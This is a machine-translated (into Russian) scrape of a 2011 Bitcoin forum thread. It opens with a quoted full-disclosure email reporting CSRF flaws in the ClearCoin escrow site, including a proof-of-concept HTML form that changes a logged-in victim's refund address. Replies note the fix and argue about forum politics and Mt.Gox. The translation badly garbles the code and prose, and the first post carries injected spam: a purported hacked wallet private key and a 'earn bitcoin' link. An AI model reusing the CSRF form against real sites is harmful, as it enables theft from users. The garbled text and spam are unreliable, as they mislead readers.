[Полное раскрытие] ClearCoin CSRFs | Биткоин форум

		Биткоин Форум > Bitcoin Обсуждение
[Полное раскрытие] ClearCoin CSRFs

19 июня 2011, 10:26:45 PM	# 1
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Взлом Биткоин адресов. 500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome" Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e подробнее... Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru Код: От: Дуг Huff Content-Type: многочастному / подпись; протокол ="Приложение / ПФГ подпись"; micalg = SHA1-PGP; граничные ="Яблочно-Mail-2--499212877" X-Smtp-сервер: smtp.gmail.com:mith@jrbobdobbs.org Тема: Bitcoin день веселья! Дата: Вс, 19 июня 2011 16:54:28 -0500 X-Универсально-Уникальный идентификатор: 52968483-4027-4d0b-9145-dc72230ee50c Message-Id: <2B2201C1-E59F-47D4-BF67-08FDB0DDE386@jrbobdobbs.org> Cc: Bitcoin Dev To: full-disclosure@lists.grok.org.uk Mime-Version: 1.0 (Apple Message рамки v1084) Content-Transfer-Encoding: 7bit X-Pgp-Agent: GPGMail 1.3.3 Это OpenPGP / MIME подписано сообщение об (RFC 2440 и 3156) --Яблочно-Mail-2--499212877 Content-Type: многочастному / подпись; граница = Яблочно-Mail-1--499212884; протокол ="Применение / pkcs7 подписи"; micalg = SHA1 --Яблочно-Mail-1--499212884 Content-Transfer-Encoding: кавычко для печати Content-Type: Текст / равнина; Charset = US-ASCII В свете последних событий в "Bitcoin сообщество" Я решил, что = частное раскрытие вопросов не делает ничего, но делает их более = превалирует. В свете этого решения я хотел бы сообщить несколько CSRF = уязвимости в http://clearcoin.appspot.com. Этот набор CSRFs особенно противный, так как это размещается на appspot = и использует учетную запись Google авторизацию. До тех пор, пока вы остаетесь вошли в ваши = Google счета вы уязвимы для этого CSRF. Вещи испытания: Изменение возврата адреса. Высвобождение средств. POC код (открыть это в любом браузере даже из локального файла): = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D <глава><заглавие>контрольная работа <тело> <Форма ID = 3D"refund_address_form" знак равно действие = 3D"https://clearcoin.appspot.com/set_refund_address" знак равно Метод = 3D"ПОСЛЕ">= 20 <этикетки для = 3D"refund_address">Ваш Bitcoin адрес:= 20 <тип входного = 3D"текст" имя = 3D"refund_address" ID = 3D"refund_address" знак равно Размер = 3D"60" значение = 3D"PUT ЛЮБОЙ АДРЕС" класс = 3D"Текст UI-виджет-контента UI-краеугольный все" автофокусировка = требуется заполнитель = 3D"возврат Bitcoin адрес"/> (обязательный) = 20 = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D = 3D Javascript авто представленню, прячась в IFRAME и другие запутывания = методы в качестве упражнения в списке. Этот сайт управляется и поддерживается Gavin Anderson, он же, ведущий Bitcoin = сопровождающий. Вы должны знать лучше Гэвина. --= 20 Дуглас Huff --Яблочно-Mail-1--499212884 Content-Disposition: вложение; имя файла = smime.p7s Content-Type: применение / pkcs7 подписи; имя = smime.p7s Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIKXDCCBN0w ggPFoAMCAQICEHGS ++ YZX6xNEoV0cTSiGKcwDQYJKoZIhvcNAQEFBQAwezELMAkGA1UEBhMCR0Ix GzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBwwHU2FsZm9yZDEaMBgGA1UECgwR Q29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMMGEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczAeFw0w NDAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQx FzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx ITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJz dC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A MIIBCgKCAQEAsjmFpPJ9q0E7YkY3rs3BYHW8OWX5ShpHornMSMxqmNVNNRm5pELlzkniii8efNIx B8dOtINknS4p1aJkxIW9hVE1eaROaJB7HHqkkqgX8pgV8pPMyaQylbsMTzC9mKALi + VuG6JG + NI8 ом + rWV6lL8 / K2m2qL + usobNqqrcuZzWLeeEeaYji5kbNoKXqvgvOdjp6Dpvq / NonWz1zHyLmSGHG TPNpsaguG7bUMSAsvIKKjqQOpdeJQ / wWWq8dcdcRWdq6hw2v + vPhwvCkxWeM1tZUOt4KpLoDd7Nl yP0e03RiqhjKaJMeoYV + 9Udly / hNVyh00jT / MLbu9mIwFIws6wIDAQABo4IBJzCCASMwHwYDVR0j BBgwFoAUoBEKIz6W8Qfs4q8p74Klf9AwpLQwHQYDVR0OBBYEFImCZ33EnSZwAEu0UEh83j2uBG59 MA4GA1UdDwEB / wQEAwIBBjAPBgNVHRMBAf8EBTADAQH / MB0GA1UdJQQWMBQGCCsGAQUFBwMCBggr BgEFBQcDBDARBgNVHSAECjAIMAYGBFUdIAAwewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5j b21vZG9jYS5jb20vQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwu Y29tb2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDARBglghkgBhvhCAQEEBAMCAQYw DQYJKoZIhvcNAQEFBQADggEBAJ2Vyzy4fqUJxB6 / C8LHdo45PJTGEKpPDMngq4RdiVTgZTvzbRx8 NywlVF + WIfw3hJGdFdwUT4HPVB1rbEVgxy35l1FM + WbKPKCCjKbI8OLp1Er57D9Wyd12jMOCAU9s APMeGmF0BEcDqcZAV5G8ZSLFJ2dPV9tkWtmNH7qGL / QGrpxp7en0zykX2OBKnxogL5dMUbtGB8SK N04g4wkxaMeexIud6H4RvDJoEJYRmETYKlFgTYjrdDrfQwYyyDlWjDoRUtNBpEMD9O3vMyfbOeAU TibJ2PU54om4k123KSZB6rObroP8d3XK6Mq1 / uJlSmM + RMTQw16Hc6mYHK9 / FX8wggV3MIIEX6AD AgECAhEA3puo39RJhNVx / ssfdXafbjANBgkqhkiG9w0BAQUFADCBrjELMAkGA1UEBhMCVVMxCzAJ BgNVBAgTAlVUMRcwFQYDVQQHEw5TYWx0IExha2UgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVT VCBOZXR3b3JrMSEwHwYDVQQLExhodHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xNjA0BgNVBAMTLVVU Ti1VU0VSRmlyc3QtQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBFbWFpbDAeFw0xMTA1MDEwMDAw MDBaFw0xMjA0MzAyMzU5NTlaMCUxIzAhBgkqhkiG9w0BCQEWFGRodWZmQGpyYm9iZG9iYnMub3Jn MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3ZPhVmPPoaj999EiZAp6e / giHUrh0Pq2 / LjCFtVgP7clqtoStYyz7i9LojgmRqKu6cswpltUICp + rRskK6ISYRYkNf9w587D2xtqHVVjmoH8 AFW / B0db4v + wC7wjzh + hFlXZ3q7sZApMqsFgAS3mdF + iEe5nNt9kGD7OhNlVimvNqcpIhJhRBhpW 7vi7 / Rt8uVciDOYVARJq7Tb1zZe88wTFkVri075 / nFYfikCgU3GccxvcnR9QwC7xoyGFtE / z8qjv 1h1Tn + eS7eEYQveQxMFNnEPHfoihpiSQpQUzEAJK96dwj8ED2CXtNpV6pQ9PCu2HWjXIVpZj + YNN eOSRbwIDAQABo4ICFjCCAhIwHwYDVR0jBBgwFoAUiYJnfcSdJnAAS7RQSHzePa4Ebn0wHQYDVR0O BBYEFGBmA3ruGdgBmCodBzi9QrRBvjz / MA4GA1UdDwEB / wQEAwIFoDAMBgNVHRMBAf8EAjAAMCAG A1UdJQQZMBcGCCsGAQUFBwMEBgsrBgEEAbIxAQMFAjARBglghkgBhvhCAQEEBAMCBSAwRgYDVR0g BD8wPTA7BgwrBgEEAbIxAQIBAQEwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1cmUuY29tb2Rv Lm5ldC9DUFMwgaUGA1UdHwSBnTCBmjBMoEqgSIZGaHR0cDovL2NybC5jb21vZG9jYS5jb20vVVRO LVVTRVJGaXJzdC1DbGllbnRBdXRoZW50aWNhdGlvbmFuZEVtYWlsLmNybDBKoEigRoZEaHR0cDov L2NybC5jb21vZG8ubmV0L1VUTi1VU0VSRmlyc3QtQ2xpZW50QXV0aGVudGljYXRpb25hbmRFbWFp bC5jcmwwbAYIKwYBBQUHAQEEYDBeMDYGCCsGAQUFBzAChipodHRwOi8vY3J0LmNvbW9kb2NhLmNv bS9VVE5BQUFDbGllbnRDQS5jcnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNv bTAfBgNVHREEGDAWgRRkaHVmZkBqcmJvYmRvYmJzLm9yZzANBgkqhkiG9w0BAQUFAAOCAQEAj / Ск hfsc3p7aoCSIMGOTVBzBjJBtCwWTUF1d / pnJ7ynWCiEOypIGGe0im5 + Y1WH8 + fVNgIwlifRSoZ1R oloxXRuqiraKCevG5OC41Evkp67HmrrhlerLxUvoKLg7sDWfYtmQ24whfYEsd3Fm2u6KxoXboyyb fdDhl5BLhWy + 5kHHlIaoZjUoHHXOMuOZdhreIcJI54 + wehddzwtdrhF0h2KUTm3tvA0e2kTX4Kzz 3JWIzFSsCmTdTx2UdiOBJmWZ8dgdskOSKRYByvSBT + / BsbF + JbJcjCHqDiEmmXQeTNuRDYeCPfkq / HRSrEZMi / RORls1HSA79IOXjvj8RkAKyDGCA / 8wggP7AgEBMIHEMIGuMQswCQYDVQQGEwJVUzEL MAkGA1UECBMCVVQxFzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRS VVNUIE5ldHdvcmsxITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMt VVROLVVTRVJGaXJzdC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx / ssfdXafbjAJBgUrDgMCGgUAoIICDzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3 DQEJBTEPFw0xMTA2MTkyMTU0MjlaMCMGCSqGSIb3DQEJBDEWBBRTgeJlgs0yICFYnbqMVlsvFVdx jTCB1QYJKwYBBAGCNxAEMYHHMIHEMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAVBgNV BAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAfBgNV BAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1DbGll bnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA3puo39RJhNVx / ssfdXafbjCB1wYLKoZIhvcN AQkQAgsxgceggcQwga4xCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJVVDEXMBUGA1UEBxMOU2FsdCBM YWtlIENpdHkxHjAcBgNVBAoTFVRoZSBVU0VSVFJVU1QgTmV0d29yazEhMB8GA1UECxMYaHR0cDov L3d3dy51c2VydHJ1c3QuY29tMTYwNAYDVQQDEy1VVE4tVVNFUkZpcnN0LUNsaWVudCBBdXRoZW50 aWNhdGlvbiBhbmQgRW1haWwCEQDem6jf1EmE1XH + yx91dp9uMA0GCSqGSIb3DQEBAQUABIIBAIa0 nEwugdoy0co / xZSmSF2FL3Q2I1QjrcwOP2svW7D6yUXl2e9xZdvxPehdGg51UJGtGDDzc5vnT5DW HWpskxWyBbwYHEM4g + Tuix0pCey7twTJ51tv4uCZljUzfNc1IrctezhdNmFJQfKIrN + Yq6b81Qnt zmK0pq + в + WVMBez9CnojZaijViQD8agyCWouZhQRPwFE7iTaARwtcuoHpN34TqvNfGpeSOAwi13 6LpFDlN9zzyVeRLgwqbiRQnd2KCzv7yWI + OlzK4bgVB5TPclErhTUvb + rAtAlZM7cDf5uFzsMk1d / Ui76BOfwXTFRAZsmyKQRjz6NeTNKuOuNtkAAAAAAAA = --Яблочно-Mail-1--499212884-- --Яблочно-Mail-2--499212877 тип содержимого: приложения / PGP-подпись; х-MAC-тип = 70674453; имя = PGP.sig Содержание-Описание: Это цифровая подпись часть сообщения контентный распоряжение: встроенный; имя файла = PGP.sig Content-Transfer-Encoding: 7bit -----НАЧАТЬ PGP SIGNATURE ----- Версия: GnuPG / MacGPG2 v2.0.17 (Darwin) Комментарий: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJN / nAVAAoJEEPHkQabDWHPBRUP / RqNgPYEjbzKLNOktnBr1Ec0 VC1k + z6dFoX8FiH4lciF + CFBPHuQ6fsbR9tbVLFVSWmym1F33KVy / 7dzsIWbCfGf Q255aHrFQsVFPejxmgzRRLhZ8D19vxp3l69ALMe3QKhVdfdfjykVZwnoeeUx7GnJ kcrcM9VWISp + Lr9Yc / HgsnerDPomAYEmiH4ur / CS6vC2PKayVoAbwh4Cr + 5UyBUP / AdYXCRhF1Mci0K3mg3boG8FQkGn + zJJ7s3TB2FMZvK43lSzS1 + f2GTfbBZRPVbq 1hyijFZJx / 4P4fX6kOICudU / 5 / 8i9X0qgRoqenXf7kJVH4 + e29JCXJNOMXMMrMZN au3H6mq6KvmZKMnxZIs4e8G1NIWzO6oOQD7BhUE8A11IlaiNiUYvT + Z1PrV3lfwP PgSUnQo3FmH4dPT + fNydQusN / sLMKdrCzRLUAj6o0ZlAu2nvzHU + spDmDluzwdNo QW7BNdgcpEUVozgFx / gxi0eXUjOfxS120uyCwLbEFWbUqwmmpxMlACpliOU439P3 p4uXpISVIOLmRY2pL2mFx9PEzAc5z4Q4 + G + HTZtp9cy5fJ7htZSKItuSbciLNlcS htX8F / г + Ap0W9Lnd + nnVXxZ8YxOufBvfptU9TSIaVq7uhIphluFiF + nMwqjg4PWE BNbnmnNAmUKC7 + bLjSzx = e0ef -----END PGP SIGNATURE ----- http://sourceforge.net/mailarchive/forum.php?thread_name=2B2201C1-E59F-47D4-BF67-08FDB0DDE386%40jrbobdobbs.org&FORUM_NAME = Bitcoin-разработка К сожалению Гэвин. (Gavin уже вытащил clearcoin форума для решения этой проблемы.) Edit: Добавление F-d ссылки для потомков. http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081574.html

Как заработать Биткоины?
Без вложений. Не майнинг.

19 июня 2011, 10:33:25 PM	# 2
Durr Сообщений: 28 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Получил 1806 Биткоинов Реальная история. Кто доверяет Гэвин так или иначе?

19 июня 2011, 10:36:13 PM	# 3
Гэвин Андресен Сообщения: 1652 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Да, не доверяет мне, пожалуйста. Я человек, и будет делать ошибки. Уязвимость CSRF на ClearCoin фиксирована. Я буду связываться с любыми клиентами ClearCoin, которые изменили их возврат адрес, чтобы убедиться, что они не были жертвой нападения CSRF.

19 июня 2011, 10:40:52 PM	# 4
Андрей Воробьев Сообщения: 565 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Вы можете сделать тысячи ошибок в веб-программировании, но, пожалуйста !!! - не трахаться с C ++

19 июня 2011, 10:43:15 PM	# 5
jrmithdobbs Сообщений: 59 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: Гэвин Андресен 19 июня 2011, 10:36:13 PM Да, не доверяет мне, пожалуйста. Я человек, и будет делать ошибки. Уязвимость CSRF на ClearCoin фиксирована. Я буду связываться с любыми клиентами ClearCoin, которые изменили их возврат адрес, чтобы убедиться, что они не были жертвой нападения CSRF. Благодарим Вас за своевременное реагирование и исправление проблемы.

20 июня 2011, 12:05:34 AM	# 6
сделанный Сообщений: 56 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Великие парни работы

20 июня 2011, 12:55:25 AM	# 7
gigitrix Сообщения: 666 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: Андрей Воробьев 19 июня 2011, 10:40:52 PM Вы можете сделать тысячи ошибок в веб-программировании, но, пожалуйста !!! - не трахаться с C ++ Хаха, никогда не имеет более истинное слово было сказано!

20 июня 2011, 12:56:32 AM	# 8
Batouzo Сообщений: 70 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: Durr 19 июня 2011, 10:33:25 PM Кто доверяет Гэвин так или иначе? Ну ... ФБР? (конференция)

20 июня 2011, 1:03:32 AM	# 9
УНК Сообщений: 84 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs это может показаться капризным, и мои извинения, если она есть, но я отчетливо помню пользователь "s" указывая на этом форуме важности подделок запроса межсайтовых и тот факт, что многие популярные сайты Bitcoin связанных были уязвимы для них. он (или она), а затем покинула форум и удалил все его / ее должности, будучи оттолкнул экстремальными либертарианцев. это еще один пример тону на форумах, создающие проблемы для Bitcoin сообщества, которые могли бы принести пользу от более широкого участия, разнообразия мнений, и вежливости. если бы люди слушали "s" а не отклоняя проблемы данного пользователя, как-то враждебно к Bitcoin, потому что они не «струнке», многие проблемы могут быть решены несколько месяцев назад.

20 июня 2011, 1:16:32 AM	# 10
NghtRppr Сообщения: 476 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: УНК от 20 июня 2011 года, 1:03:32 AM это может показаться капризным, и мои извинения, если она есть, но я отчетливо помню пользователь "s" указывая на этом форуме важности подделок запроса межсайтовых и тот факт, что многие популярные сайты Bitcoin связанных были уязвимы для них. он (или она), а затем покинула форум и удалил все его / ее должности, будучи оттолкнул экстремальными либертарианцев. это еще один пример тону на форумах, создающих проблемы для Bitcoin сообщества, которые могли бы извлечь выгоду из более широкого участия, разнообразие мнений, и вежливости. если бы люди слушали "s" а не отклоняя проблемы данного пользователя, как-то враждебно к Bitcoin, потому что они не «струнке», многие проблемы могут быть решены несколько месяцев назад. Я обижаться комков всех нас либертарианцы вместе, как если бы мы проблема. Пожалуйста, просмотрите мой пост историю, и вы увидите, что я просто не заниматься личными нападками или оскорбительным поведением в целом, даже если грубо оскорбил. Люди, которые осуждают все, что может девальвировать БТД являются люди, которые только в Bitcoin, чтобы сделать несколько быстрых баксов. Я в нем в долгосрочной перспективе, потому что я ценю экономическую свободу как либертарианцы. Я бы предпочел видеть валюту стабилизации, чем зарабатывать деньги. У меня есть источник дохода. Мне не нужно спекулировать. Я также приветствую раскрытие уязвимостей, поскольку это оказывает давление на администратор, чтобы исправить эту проблему, а также уведомляет сообщество, что они должны думать дважды о доверии ключи к царству без учета риска. Пожалуйста, пересмотреть свое мнение о либертарианцев, потому что даже тогда, когда спекулянты давно прошли, мы все еще здесь, желающих использовать эту валюту.

20 июня 2011, 2:09:52 AM	# 11
ледокол Сообщения: 1862 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: УНК от 20 июня 2011 года, 1:03:32 AM это может показаться капризным, и мои извинения, если она есть, но я отчетливо помню пользователь "s" указывая на этом форуме важности подделок запроса межсайтовых и тот факт, что многие популярные сайты Bitcoin связанных были уязвимы для них. он (или она), а затем покинула форум и удалил все его / ее должности, будучи оттолкнул экстремальными либертарианцев. это еще один пример тону на форумах, создающие проблемы для Bitcoin сообщества, которые могли бы принести пользу от более широкого участия, разнообразия мнений, и вежливости. если бы люди слушали "s" а не отклоняя проблемы данного пользователя, как-то враждебно к Bitcoin, потому что они не «струнке», многие проблемы могут быть решены несколько месяцев назад. Я тоже виноват Айн Рэнд за все зло в мире, и особенно на этом форуме. / s Это на самом деле больше, чем lulzy раздражительным. Я думаю, что мы все узнали некоторые ценные уроки сегодня, о скучных XCHMLL ошибок веб-стандартов, которые вызывают HTXL->BTC переполнении или любой другой. И не используя тот же л / с. И должная осмотрительность.

20 июня 2011, 2:22:07 AM	# 12
триумвир Сообщений: 56 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Любительский час весь путь вокруг.

20 июня 2011, 2:36:43 AM	# 13
УНК Сообщений: 84 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: ледокол от 20 июня 2011 года, 2:09:52 AM Я тоже виноват Айн Рэнд за все зло в мире, и особенно на этом форуме. «Для некоторых смешных и экстремальных настроений среди подростков» это не то же самое, что «все зло в мире». но bitcoin2cash прав. я на самом деле просто определенный тип плаката в виду. это не все, кто случается либертарианский; это ярые, часто подростки, кто думает, что любая критика протокола Bitcoin должен быть мотивирован промывания мозгов от «государства». котировка Я думаю, что мы все узнали некоторые ценные уроки сегодня, о скучных XCHMLL ошибок веб-стандартов, которые вызывают HTXL->BTC переполнении или любой другой. это были не уроки, чтобы узнать; это очевидно любому, кто даже малейшего опыта в области безопасности системы. как я сказал, хороший критический пользователь, который посетил форум за неделю указал на них, в частности, наряду с целым рядом других проблем. либо есть слишком много шума или слишком много самодовольства для людей, чтобы слушать или учиться до проблемы проявляются.

20 июня 2011, 4:04:09 AM	# 14
ледокол Сообщения: 1862 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: УНК от 20 июня 2011 года, 2:36:43 AM я на самом деле просто определенный тип плаката в виду. это не все, кто случается либертарианский; это ярые, часто подростки, кто думает, что любая критика протокола Bitcoin должен быть мотивирован промывания мозгов от «государства». Многие подростки еще не научились терпеть невежественного лицемерия тех, чьи коленный рефлекс возражения Bitcoin не только конкретно рассмотрены конструкции, но, очевидно, применимы к декретных денег, созданных государством. Это хорошая вещь. Я люблю людей, которые стоят и энергично отстаивать свои ценности и убеждения. Если вы или другой человек, который ушел, не можете смотреть мимо их энтузиазма, страстности и усердия, что это ваша проблема. Даже разумный взрослый человек может заболеть приходится неоднократно указывают на то, что федеральные резервные примечания являются способом больше поддельные Понци плагиат жульничества, чем какой-либо форме cryptocash. котировка это были не уроки, чтобы узнать; это очевидно любому, кто даже малейшего опыта в области безопасности системы. как я сказал, хороший критический пользователь, который посетил форум за неделю указал на них, в частности, наряду с целым рядом других проблем. либо есть слишком много шума или слишком много самодовольства для людей, чтобы слушать или учиться до проблемы проявляются. Хорошая попытка, Гоча парень. Но оказывается, что предполагаемый MtGox "мотыга" была внутренняя работа. Она не имела никакого отношения к XSRF, SQL, или каким бы техническим Направьте сверхчувствительный парень (который убегал, а не дебаты означают, вонючие либертарианцев) ранее разговоре о.

20 июня 2011, 4:07:18 AM	# 15
УНК Сообщений: 84 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: ледокол от 20 июня 2011 года, 4:04:09 AM Хорошая попытка, Гоча парень. Но оказывается, что предполагаемый MtGox "мотыга" была внутренняя работа. Она не имела никакого отношения к XSRF, SQL, или каким бы техническим Направьте сверхчувствительный парень (который убегал, а не дебаты означают, вонючие либертарианцев) ранее разговоре о. гора GOX был, в течение последней недели, и по их собственному признанию, уязвимого к подделкам запроса кросс-сайта. я не помню "s" никогда не говорил ничего о SQL инъекций, который трудно обнаружить без доступа к коду. (Это не стоит обсуждать это, если вы не технический человек самостоятельно.)

20 июня 2011, 4:54:36 AM	# 16
ледокол Сообщения: 1862 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: УНК от 20 июня 2011 года, 4:07:18 AM Цитата: ледокол от 20 июня 2011 года, 4:04:09 AM Хорошая попытка, Гоча парень. Но оказывается, что предполагаемый MtGox "мотыга" была внутренняя работа. Она не имела никакого отношения к XSRF, SQL, или каким бы техническим Направьте сверхчувствительный парень (который убегал, а не дебаты означают, вонючие либертарианцев) ранее разговоре о. гора GOX был, в течение последней недели, и по их собственному признанию, уязвимого к подделкам запроса кросс-сайта. я не помню "s" никогда не говорил ничего о SQL инъекций, который трудно обнаружить без доступа к коду. (Это не стоит обсуждать это, если вы не технический человек самостоятельно.) Никто не обсуждает, существует ли уязвимость XSRF больше, как это было показано в пятницу вечером. Это было исправлено, и не имеет ничего общего с обкаткой, которая была по вине финансового аудитора MtGox, а не РЕЗУЛЬТАТ XSRF, SQL, трояны, вихорь, или любые ваша BUDDY стонала О. Теперь вопрос заключается в том, что так многие из них были настолько быстры, чтобы указать пальцем сразу же после нарушения MtGox, не заботясь, чтобы подтвердить или проверить что-либо с принципами, участвующих. Вы не только "OMG мы пытались предупредить их, но они DINT Lisen" профан, который был опровергнут на сегодняшнего интервью. Есть / были много экспертных мнений, то есть домыслы быть брошенными вокруг. Избавь нас в "это не стоит обсуждать это, если вы не технический человек сам" снобизм. Вы можете быть уверены, что я понимаю разницу между инъекцией XSRF и SQL. Мне платят, чтобы сделать чертовски уверен, что такие вещи продолжают работать гладко. Я уверен, что ваш е-боек настолько массивным, что бы паническое бегство женщин и пугают детей, поэтому, пожалуйста, держать его закрытым и к себе.

20 июня 2011, 5:00:04 AM	# 17
УНК Сообщений: 84 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: ледокол от 20 июня 2011 года, 4:54:36 AM Вы не только "OMG мы пытались предупредить их, но они DINT Lisen" профан, который был опровергнут на сегодняшнего интервью. Есть / были много экспертных мнений, то есть домыслы быть брошенными вокруг. Я не ясно, что вы думаете, я сказал, что было «опровергнуто», но я верю, что вы ошибаетесь. котировка Избавь нас в "это не стоит обсуждать это, если вы не технический человек сам" снобизм. Вы можете быть уверены, что я понимаю разницу между инъекцией XSRF и SQL. Мне платят, чтобы сделать чертовски уверен, что такие вещи продолжают работать гладко. Я уверен, что ваш е-боек настолько массивным, что бы паническое бегство женщин и пугают детей, поэтому, пожалуйста, держать его закрытым и к себе. это опять только вид детской ответ, что я критикуя. вы упомянули «XCHMLL ошибки, которые вызывают HTXL->BTC переполнение или любой другой "; разумный вывод из такого рода комментария является то, что у вас мало технического понимание концепций, которые мы обсуждаем. если это не так, вы не можете обвинить меня за собирание на анти-интеллектуальный маньеризм вы намеренно выдвинутыми.

20 июня 2011, 5:11:59 AM	# 18
ледокол Сообщения: 1862 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: УНК от 20 июня 2011 года, 5:00:04 AM Цитата: ледокол от 20 июня 2011 года, 4:54:36 AM Вы не только "OMG мы пытались предупредить их, но они DINT Lisen" профан, который был опровергнут на сегодняшнего интервью. Есть / были много экспертных мнений, то есть домыслы быть брошенными вокруг. Я не ясно, что вы думаете, я сказал, что было «опровергнуто», но я верю, что вы ошибаетесь. котировка Избавь нас в "это не стоит обсуждать это, если вы не технический человек сам" снобизм. Вы можете быть уверены, что я понимаю разницу между инъекцией XSRF и SQL. Мне платят, чтобы сделать чертовски уверен, что такие вещи продолжают работать гладко. Я уверен, что ваш е-боек настолько массивным, что бы паническое бегство женщин и пугают детей, поэтому, пожалуйста, держать его закрытым и к себе. это опять только вид детской ответ, что я критикуя. вы упомянули «XCHMLL ошибки, которые вызывают HTXL->BTC переполнение или любой другой "; разумный вывод из такого рода комментария является то, что у вас мало технического понимание концепций, которые мы обсуждаем. если это не так, вы не можете обвинить меня за собирание на анти-интеллектуальный маньеризм вы намеренно выдвинутыми. Это не так уж трудно: интервью сегодня (вы смотрели?) О обкатки доказали, что все люди, которые утверждали, что они знали причину грабежа MtGox ошибались. Ваше раздражительное отсутствие юмора гораздо больше детски, чем мои высмеять идею техноболтовни как убедительное объяснение ситуации MtGox. Ваше чувство юмора, раздражительный вывод относительно моего технического понимания концепций под руку не был разумным, особенно учитывая мои предыдущие посты и продемонстрировал скорость хеширования.

20 июня 2011, 5:21:23 AM	# 19
УНК Сообщений: 84 Цитировать по имени цитировать ответ	Re: [Полное раскрытие] ClearCoin CSRFs Цитата: ледокол от 20 июня 2011 года, 5:11:59 AM Это не так уж трудно: интервью сегодня (вы смотрели?) О обкатки доказали, что все люди, которые утверждали, что они знали причину грабежа MtGox ошибались. и где вы думаете, я когда-либо утверждал, что я знал причину проблем на мт. GOX? я даже не говорить о них. обратите внимание, что мы находимся в дискуссии о проблеме подделки межсайтовой на clearcoin. я воспитывался мт. GOX только после того, как вы назвали меня «Гоча парнем» и, казались, предполагаете, что они никогда не были уязвимы для таких проблем запроса подделки. я знаю, что это интернет-форум и все, и понимание прочитанного не может быть ваша сила, но это может быть стоит на самом деле читать то, что я имею в виду, прежде чем критиковать его, называя меня «профан», и ссылаясь на мой E-ПЕЭС ». растут, пожалуйста.

20 июня 2011, 5:42:16 AM	# 20
